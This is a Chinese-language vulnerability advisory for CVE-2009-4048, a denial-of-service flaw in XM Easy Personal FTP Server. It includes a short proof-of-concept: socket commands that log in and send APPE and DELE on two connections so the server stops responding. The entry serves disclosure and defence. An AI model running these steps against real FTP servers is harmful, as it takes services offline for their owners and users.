Dxmsoft XM Easy Personal FTP Server... CVE-2009-4048 CNNVD-200911-231

4.0 AV AC AU C I A
发布: 2009-11-23
修订: 2018-10-10

XM Easy Personal FTP Server是一款简单易用的个人FTP服务器工具。用户登录到XM Personal FTP Server后对一个套接字连接使用APPE命令而对另一个连接使用DELE命令就会导致服务器停止响应。 第一个套接字连接: 1.sock.connect((hostname, 21)) 2.sock.send(\"user \\%s\r\n\" \\%username) 3.sock.send(\"pass \\%s\r\n\" \\%passwd) 4.sock.send(\"PORT 127,0,0,1,122,107\r\n\") 5.sock.send(\"APPE \"+ test_string +\"\r\n\") 6.sock.close() 第二个套接字连接: 1.sock.connect((hostname, 21)) 2.sock.send(\"user \\%s\r\n\" \\%username) 3.sock.send(\"pass \\%s\r\n\" \\%passwd) 4.sock.send(\"DELE \"+ test_string +\"\r\n\")

0%
当前有3条漏洞利用/PoC
当前有1条受影响产品信息